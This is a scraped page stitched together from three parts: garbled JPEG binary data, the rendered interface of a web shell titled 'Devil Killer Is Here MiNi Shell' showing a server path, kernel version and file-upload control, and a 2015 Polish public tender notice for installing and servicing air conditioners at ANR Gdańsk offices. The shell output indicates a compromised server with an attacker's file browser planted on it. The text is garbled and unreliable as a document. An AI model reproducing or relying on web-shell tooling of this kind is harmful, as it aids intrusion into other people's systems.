JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/331000-N-2015.html

<p class="kh_header"><b>Pruszcz Gdański: Dostawa, montaż i uruchomienie klimatyzatorów wraz z usługą przeglądów gwarancyjnych w Sekcjach Zamiejscowych Gospodarowania Zasobem OT ANR Gdańsk</b><br>
<b>Numer ogłoszenia: 331000 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Gdańsku , ul. Powstańców Warszawy 28, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 3004841, 3023817, faks 058 3004843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa oosba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż i uruchomienie klimatyzatorów wraz z usługą przeglądów gwarancyjnych w Sekcjach Zamiejscowych Gospodarowania Zasobem OT ANR Gdańsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest:
a) dostawa  wraz z montażem i uruchomieniem fabrycznie nowych klimatyzatorów inverterowych w budynkach OT Agencji Nieruchomości Rolnych Gdańsk - Sekcji Zamiejscowych w Słupsku, Malborku oraz w Skarszewach o parametrach szczegółowo opisanych w zestawieniu stanowiącym załącznik nr A, B i C do SIWZ;
b) wykonanie usług w zakresie przeglądów gwarancyjnych (co najmniej 2 razy w roku 
w szczególności przed okresem letnim i zimowym) oraz naprawy z wymianą zużytych elementów eksploatacyjnych klimatyzatorów o parametrach szczegółowo opisanych w załączniku nr A do SIWZ, o których mowa w pkt a) będących w okresie gwarancji - zgodnie z zaleceniami przedstawionymi w karcie gwarancyjnej producenta urządzeń. W zakres zamówienia wchodzą także ewentualne dodatkowe przeglądy obowiązkowe, warunkujące wykonywanie uprawnień wynikających z gwarancji, wyznaczone przez Autoryzowany Punkt Serwisowy (APS) w przypadkach uzasadnionych warunkami eksploatacyjnymi urządzeń.

4.2 Przedmiot zamówienia został podzielony ze względu na miejsce montażu na 3 części - 3 zadania w następujący sposób:
Część 1 - zadanie nr 1:
Dostawa, montaż, uruchomienie klimatyzatorów oraz usługa przeglądów gwarancyjnych w Sekcji Zamiejscowej Gospodarowania Zasobem w Słupsku ul.  3-go Maja 44,  76-200 Słupsk, obejmująca:
- 1 zestaw multi I (1 jednostka zewnętrzna - 10,5 kW,  4 jednostki wewnętrzne)
- 1 zestaw multi II (1 jednostka zewnętrzna - 10,5 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi III (1 jednostka zewnętrzna - 8,2 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi IV (1 jednostka zewnętrzna - 10,5 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi V (1 jednostka zewnętrzna - 7,9 kW, 2 jednostki wewnętrzne)
- 1 zestaw multi VI (1 jednostka zewnętrzna - 7,9 kW, 3 jednostki wewnętrzne)
- 2 urządzenia typu Split kasetonowe o mocy 16 KW każde
o parametrach szczegółowo opisanych w załączniku A do SIWZ oraz dokumentacji projektowej.
Część 2 - zadanie nr 2 
Dostawa, montaż, uruchomienie klimatyzatorów oraz usługa przeglądów gwarancyjnych w Sekcji Zamiejscowej Gospodarowania Zasobem w Malborku ul. Wołyńska 19, 82-200 Malbork, obejmująca:
- 1 zestaw multi I (1 jednostka zewnętrzna - 10,5 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi II (1 jednostka zewnętrzna - 12,3 kW, 3 jednostki wewnętrzne)
o parametrach szczegółowo opisanych w załączniku B do SIWZ oraz dokumentacji projektowej.	

Część 3 - zadanie nr 3 
Dostawa, montaż, uruchomienie klimatyzatorów oraz usługa przeglądów gwarancyjnych w Sekcja Zamiejscowej Gospodarowania Zasobem w Skarszewach ul. Starogardzka, 83-250 Skarszewy, obejmująca:
- 1 zestaw multi- Split  I (1 jednostka zewnętrzna - 10,5 KW, 3 jednostki wewnętrzne)
- 1 zestaw multi - Split II (1 jednostka zewnętrzna - 12,5 KW, 4 jednostki wewnętrzne)
- 1 zestaw Split - 6,8 kW
o parametrach szczegółowo opisanych w załączniku C do SIWZ oraz dokumentacji projektowej.

4.3	Przedmiot zamówienia musi być wykonany zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych, sztuką budowlaną, przy zachowaniu optymalizacji wykonania.
4.4	Wykonawca winien dokonać wizji lokalnej terenu, a także zdobyć na własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą posłużyć do przygotowania oferty, zawarcia umowy 
i wykonania zamówienia.
Kontakt w sprawie przeprowadzenia wizji lokalnej:
- SZGZ w Słupsku - tel. (059) 843-96-85
- SZGZ w Malborku - tel. (055) 272- 23-82
- SZGZ w Skarszewach - tel. (58) 588-07-15
4.5	Wykonawca zobowiązany jest do:
1)	poniesienia wszystkich kosztów związanych z rozładunkiem i transportem sprzętu, 
2)	zabezpieczenia instalowanego sprzętu przed uszkodzeniem i zniszczeń do dnia odbioru, 
3)	przekazania instrukcji DTR i kart gwarancyjnych,
4)	dokonania niezbędnych prac adaptacyjnych instalacji elektrycznych wg wytycznych producenta instalowanego sprzętu, w tym rozbudowę tablic bezpiecznikowych, 
5)	prowadzenia przewodów instalacji elektrycznych i klimatyzacyjnych w korytkach zamkniętych,
6)	uczestniczenia w odbiorach, naradach,
7)	utrzymania terenu prowadzonych prac montażowych i uporządkowanie terenu po pracach,
8)	dokonania pomiarów instalacji elektrycznych,
9)	dokonania niezbędnych prac instalacyjnych wraz z zakupem niezbędnych materiałów, 
10)	prowadzenie gospodarki odpadami zgodnie z obowiązującymi przepisami,



4.6	Każdorazowy przegląd obejmować będzie wszystkie czynności zalecone przez producenta urządzeń, 
a także - nawet jeśli producent ich nie określił:
1)	czyszczenie filtrów powietrza (urządzenia kanałowe czyszczenie/wymiana),
2)	czyszczenie wymiennika jednostki wewnętrznej (raz w roku z użyciem środków odgrzybiających),
3)	sprawdzenie szczelności układu chłodniczego oraz stanu napełnienia czynnikiem chłodniczym, 
w razie potrzeby uzupełnienie czynnika,
4)	sprawdzenie skuteczności funkcji chłodzenie i grzania,
5)	czyszczenie jednostek wewnętrznych,
6)	czyszczenie wymienników ciepła jednostek zewnętrznych (czyszczenie ciśnieniowe jako czynność dodatkowa),
7)	sprawdzenie drożności układów odprowadzania skroplin,
8)	przegląd instalacji chłodniczej i elektrycznej,
9)	sprawdzenie działania urządzeń sterujących,
10)	sprawdzenie (wymiana) baterii w pilotach,
11)	czynności pomiarowe: pobór prądu przez poszczególne urządzenia, temperatura wlot/wylot 
w jednostkach wewnętrznych i zewnętrznych, ciśnienie tłoczenie/ssanie, kontrola zabezpieczeń LP/HP/przekroczenia temperatur,
12)	naprawę urządzeń w ramach gwarancji.

4.7	W przypadku wystąpienia konieczności naprawy urządzenia będącego na gwarancji Wykonawca rozpocznie realizację zlecenia naprawy w terminie nie dłuższym niż 3 dni robocze od daty przekazania zlecenia przez Zamawiającego, a termin wykonania nie przekroczy 10 dni roboczych. Dopuszcza się 
z przyczyn niezależnych od Wykonawcy przedłużenia terminu wykonania naprawy gwarancyjnej po zaakceptowaniu przez Zamawiającego pisemnego wniosku Wykonawcy z uzasadnieniem. Warunkami niezależnymi od wykonawcą są:
a)	chwilowy brak części zamiennych (w tym przypadku Zamawiający po przesłaniu dokumentów potwierdzających tę okoliczność przedłuży termin o czas oczekiwania jednak nie dłużej niż o 7 dni roboczych), 
b)	brak dostępu do obiektu,
c)	brak prądu,
d)	klęski żywiołowe,
e)	rozruchy, wojny, itp..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.10.00-6, 45.33.20.00-3, 45.33.12.00-8, 45.33.23.00-6, 45.33.12.20-4, 39.71.72.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 
nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje wiedzą i doświadczeniem w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
a) składając ofertę na zadanie nr 1 - co najmniej dwie dostawy z montażem i uruchomieniem urządzeń klimatyzacji o wartości co najmniej 60 000,00 zł brutto każda,
b) składając ofertę na zadanie nr 2 - co najmniej dwie dostawy z montażem i uruchomieniem urządzeń  klimatyzacji o wartości co najmniej 20 000,00 zł brutto każda,
c) składając ofertę na zadanie nr 3 - co najmniej dwie dostawy z montażem i uruchomieniem urządzeń  klimatyzacji o wartości co najmniej 20 000,00 zł brutto każda
potwierdzone dowodami określającymi, czy roboty te zostały wykonane w sposób należyty oraz wskazującymi czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunku oraz weryfikacja zdolności
wykonawcy do należytego wykonania zamówienia dokonywana będzie na podstawie dokumentów wymienionych w ust. 2.2.1 pkt 2), ust 2.2.3 pkt 2) i ust. 2.2.4 Części II SIWZ. Jeżeli z treści tych dokumentów wynikać będzie, że wykonawca spełnia warunek, zamawiający uzna go za spełniony</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 
nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje:
a) co najmniej jedną osobą posiadającą aktualny certyfikat autoryzacji lub ukończenie przeszkolenia w zakresie montażu oraz serwisu urządzeń klimatyzacyjnych wydany przez producenta zaoferowanych urządzeń;
b) co najmniej jedną osobą posiadającą uprawnienia SEP do wykonania instalacji oraz pomiarów do 1kV.
Ocena spełnienia warunku oraz weryfikacja zdolności
wykonawcy do należytego wykonania zamówienia dokonywana będzie na podstawie dokumentów wymienionych w ust. 2.2.1 pkt 2), ust 2.2.3 pkt 1) i ust. 2.2.4 Części II SIWZ. Jeżeli z treści tych dokumentów wynikać będzie, że wykonawca spełnia warunek, zamawiający uzna go za spełniony</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 
nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>a) składając ofertę na zadanie nr 1 - co najmniej dwie dostawy z montażem i uruchomieniem urządzeń klimatyzacji o wartości co najmniej 60 000,00 zł brutto każda,
b) składając ofertę na zadanie nr 2 - co najmniej dwie dostawy z montażem i uruchomieniem urządzeń  klimatyzacji o wartości co najmniej 20 000,00 zł brutto każda,
c) składając ofertę na zadanie nr 3 - co najmniej dwie dostawy z montażem i uruchomieniem urządzeń  klimatyzacji o wartości co najmniej 20 000,00 zł brutto każda;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany druk Formularz oferty zgodny w treści z załącznikiem nr 1 do SIWZ. 
2. Jeżeli ofertę składa i podpisuje pełnomocnik, do oferty należy dołączyć stosowne pełnomocnictwo, jeżeli umocowanie do złożenia oferty nie wynika z innych dokumentów dołączonych do oferty. 
3. Jeżeli wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach
finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie
realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostepnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji producenta urządzeń - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z treścią art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie zawartej z Wykonawcą, za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany w niżej wymienionych przypadkach:
1) zmiany terminu realizacji:
a) z powodu zaistnienia po zawarciu umowy przypadku siły wyższej, przez którą rozumieć się będzie zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec przy zachowaniu należytej staranności i zaistnienia konieczności wydłużenia terminu zakończenia realizacji umowy na skutek zaistnienia siły wyższej. Za siłę wyższa, warunkująca zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe. Interpretację zdarzenia siły wyższej i ewentualnym uznaniu przedłużenia terminu wykonania robót z tego powodu, będzie decydował zamawiający w trakcie realizacji robót, po złożeniu pisemnego wniosku Wykonawcy,
b) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
c) z powodu niekorzystnych warunków atmosferycznych, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 83-000 Pruszcz Gdański, ul. Powstańców Warszawy 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 10:00, miejsce: Sekretariat Agencji Nieruchomości Rolnych Oddziału Terenowego w Gdańsku z siedzibą
w Pruszczu Gdańskim, ul. Powstańców Warszawy 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W kryterium OKRES GWARANCJI PRODUCENTA URZĄDZEŃ wykonawca może uzyskać maksymalnie 5 pkt:
1) w przypadku zaoferowania 5 letniego okresu gwarancji producenta urządzeń, Wykonawca otrzyma  5 pkt; 
2) w przypadku zaoferowania 4 letniego okresu gwarancji producenta urządzeń,  Wykonawca otrzyma 3 pkt;
3) w przypadku zaoferowania 3 letniego okresu gwarancji producenta urządzeń,  Wykonawca otrzyma 0 pkt..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa, montaż, uruchomienie klimatyzatorów oraz usługa przeglądów gwarancyjnych w Sekcji Zamiejscowej Gospodarowania Zasobem w Słupsku ul.  3-go Maja 44,  76-200 Słupsk, obejmująca:
- 1 zestaw multi I (1 jednostka zewnętrzna - 10,5 kW,  4 jednostki wewnętrzne)
- 1 zestaw multi II (1 jednostka zewnętrzna - 10,5 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi III (1 jednostka zewnętrzna - 8,2 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi IV (1 jednostka zewnętrzna - 10,5 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi V (1 jednostka zewnętrzna - 7,9 kW, 2 jednostki wewnętrzne)
- 1 zestaw multi VI (1 jednostka zewnętrzna - 7,9 kW, 3 jednostki wewnętrzne)
- 2 urządzenia typu Split kasetonowe o mocy 16 KW każde
o parametrach szczegółowo opisanych w załączniku A do SIWZ oraz dokumentacji projektowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.10.00-6, 45.33.20.00-3, 45.33.12.00-8, 45.33.23.00-6, 45.33.12.20-4, 39.71.72.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji producenta urządzeń - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa, montaż, uruchomienie klimatyzatorów oraz usługa przeglądów gwarancyjnych w Sekcji Zamiejscowej Gospodarowania Zasobem w Malborku ul. Wołyńska 19, 82-200 Malbork, obejmująca:
- 1 zestaw multi I (1 jednostka zewnętrzna - 10,5 kW, 4 jednostki wewnętrzne)
- 1 zestaw multi II (1 jednostka zewnętrzna - 12,3 kW, 3 jednostki wewnętrzne)
o parametrach szczegółowo opisanych w załączniku B do SIWZ oraz dokumentacji projektowej..</p></li>
